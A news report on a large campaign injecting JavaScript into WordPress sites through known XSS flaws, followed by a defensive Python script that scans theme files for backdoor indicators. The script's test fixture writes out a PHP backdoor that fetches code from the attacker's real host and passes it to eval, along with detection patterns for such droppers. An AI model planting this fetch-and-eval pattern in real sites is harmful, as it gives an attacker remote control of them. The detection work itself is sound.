More than 900,000 WordPress websites were attacked over the space of about a week, according to a recent report from the cybersecurity company Defiant. The attacks came from around 24,000 different IP addresses, but they are all believed to be the work of a single threat actor because every one of them attempted to inject the same malicious JavaScript payload into the targeted sites.
While the attacks have been ongoing for around a month, the peak occurred on May 3, when around half a million websites were targeted in around 20 million attack attempts. Multiple flaws have been targeted, most of which are cross-site scripting (XSS) vulnerabilities in the Newspaper theme and in the Easy2Map and Blog Designer plugins. Vulnerabilities in the WP GDPR Compliance and Total Donations plugins have also been targeted. None of the vulnerabilities is new: patches correcting the flaws were released several months ago, so the campaign succeeds only against sites that have not kept those components up to date.
Visitors who are not logged in as an administrator are simply redirected to a malvertising URL. If the malicious JavaScript executes in the browser of an administrator who is currently logged in, it instead uses that administrator's session to inject a PHP backdoor into the theme's header file, along with additional malicious JavaScript. The PHP backdoor then attempts to download a further payload from the attacker's server and executes it by including it from the theme's header. This is what turns a stored XSS flaw into a full site takeover: the injection runs with the administrator's privileges, not the attacker's.
“This method would allow the attacker to maintain control of the site, as they could simply change the contents of the file at https://stat[.]trackstatisticsss[.]com/n.txt to code of their choice which could be used to embed a webshell, create a malicious administrator, or even delete the entire contents of the site,” said Defiant.
Defiant warns that, given the scale of the campaign and the variety of vulnerabilities being exploited, any WordPress site could be exposed to attack, and suggests the attacker will likely pivot to other vulnerabilities in future attacks.
WordPress website owners have been advised to log in to their websites and ensure they are running the latest version of WordPress, update all plugins and themes on the site, and delete any plugins that have been removed from the WordPress repository, since those will never receive a fix. Updating closes the entry point but does not remove a backdoor that has already been planted, so sites that may have been hit while vulnerable should also inspect their theme files, in particular the theme header, for injected PHP or script tags that load code from unfamiliar domains. Website owners should also consider using a web application firewall, which can provide some protection against vulnerabilities that have not yet been patched.
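As an added example (not code from the article or from Defiant), the script below performs the post-update check described above: it walks a theme directory and flags files that reference the payload host named in the report, that fetch content from a remote URL from inside PHP, that pass a variable to `eval()`, or that load a `<script>` from a host outside an allowlist. The regular expressions are an illustrative signature set chosen for this example, not Defiant's published rules, and the two `header.php` files it scans are constructed stand-ins written by the example itself, so it runs offline.

```python
import os
import re
import tempfile
from pathlib import Path

# Payload host named in the Defiant report (defanged in the article text).
KNOWN_PAYLOAD_HOST = "trackstatisticsss.com"

# Illustrative indicators (assumption: chosen for this example, not a vendor ruleset).
SUSPICIOUS_PATTERNS = [
    ("known-payload-host", re.compile(re.escape(KNOWN_PAYLOAD_HOST), re.I)),
    # PHP pulling code from a remote URL: file_get_contents('http://...'), curl_init('http://...')
    ("remote-fetch", re.compile(r"\b(file_get_contents|curl_init|fopen)\s*\(\s*['\"]https?://", re.I)),
    # include/require of a remote URL (needs allow_url_include, but droppers try it anyway)
    ("remote-include", re.compile(r"\b(include|require)(_once)?\s*\(?\s*['\"]https?://", re.I)),
    # eval() of a variable or of decoded data is almost never legitimate in a theme
    ("eval-variable", re.compile(r"\beval\s*\(\s*(\$|base64_decode|gzinflate|str_rot13)", re.I)),
]

# External <script src="https://host/..."> tags; the host is checked against an allowlist.
EXTERNAL_SCRIPT = re.compile(r"<script[^>]*\ssrc\s*=\s*['\"]https?://(?P<host>[^/'\"]+)", re.I)


def scan_file(path, allowed_script_hosts=()):
    """Return a list of (indicator, line_number, detail) findings for one file."""
    findings = []
    try:
        text = Path(path).read_text(errors="replace")
    except OSError:
        return findings
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, rx in SUSPICIOUS_PATTERNS:
            if rx.search(line):
                findings.append((name, lineno, line.strip()[:120]))
        for m in EXTERNAL_SCRIPT.finditer(line):
            host = m.group("host").lower()
            if host not in {h.lower() for h in allowed_script_hosts}:
                findings.append(("external-script", lineno, host))
    return findings


def scan_themes(themes_root, allowed_script_hosts=()):
    """Scan every .php/.js file under wp-content/themes; keys are paths relative to the root."""
    themes_root = Path(themes_root)
    results = {}
    for dirpath, _dirs, files in os.walk(themes_root):
        for fname in files:
            if not fname.lower().endswith((".php", ".js")):
                continue
            full = Path(dirpath) / fname
            findings = scan_file(full, allowed_script_hosts)
            if findings:
                results[full.relative_to(themes_root).as_posix()] = findings
    return results


# Constructed sample theme headers for the example (not real theme or malware code).
CLEAN_HEADER = """<?php
/* constructed clean header.php */
?><!DOCTYPE html>
<html <?php language_attributes(); ?>>
<head>
<script src="https://cdn.clean-vendor.invalid/ui.js"></script>
<?php wp_head(); ?>
</head>
<body <?php body_class(); ?>>
"""

INFECTED_HEADER = """<?php
/* constructed header.php carrying a stand-in for the injected remote-fetch backdoor */
$c = @file_get_contents('https://stat.trackstatisticsss.com/n.txt');
if ($c !== false) { eval($c); }
?><!DOCTYPE html>
<html <?php language_attributes(); ?>>
<head>
<script src="https://stat.trackstatisticsss.com/t.js"></script>
<?php wp_head(); ?>
</head>
"""


def build_sample_site(root=None):
    """Write the two constructed headers into a throwaway wp-content/themes tree; return its path."""
    root = Path(root) if root else Path(tempfile.mkdtemp(prefix="wp-scan-"))
    themes = root / "wp-content" / "themes"
    (themes / "clean-theme").mkdir(parents=True, exist_ok=True)
    (themes / "hacked-theme").mkdir(parents=True, exist_ok=True)
    (themes / "clean-theme" / "header.php").write_text(CLEAN_HEADER)
    (themes / "hacked-theme" / "header.php").write_text(INFECTED_HEADER)
    return themes


if __name__ == "__main__":
    themes_dir = build_sample_site()
    for rel_path, hits in scan_themes(themes_dir, allowed_script_hosts=("cdn.clean-vendor.invalid",)).items():
        for indicator, lineno, detail in hits:
            print(f"{rel_path}:{lineno}: {indicator}: {detail}")
```

Run it against a real install by calling `scan_themes("/var/www/html/wp-content/themes", allowed_script_hosts=(...))` with the third-party script hosts your theme legitimately uses; anything it flags should be compared against a clean copy of the theme from the vendor rather than edited in place, and a hit on the payload host means the site should be treated as compromised, not merely outdated. The update step itself is easiest to script with WP-CLI (`wp core update`, `wp plugin update --all`, `wp theme update --all`).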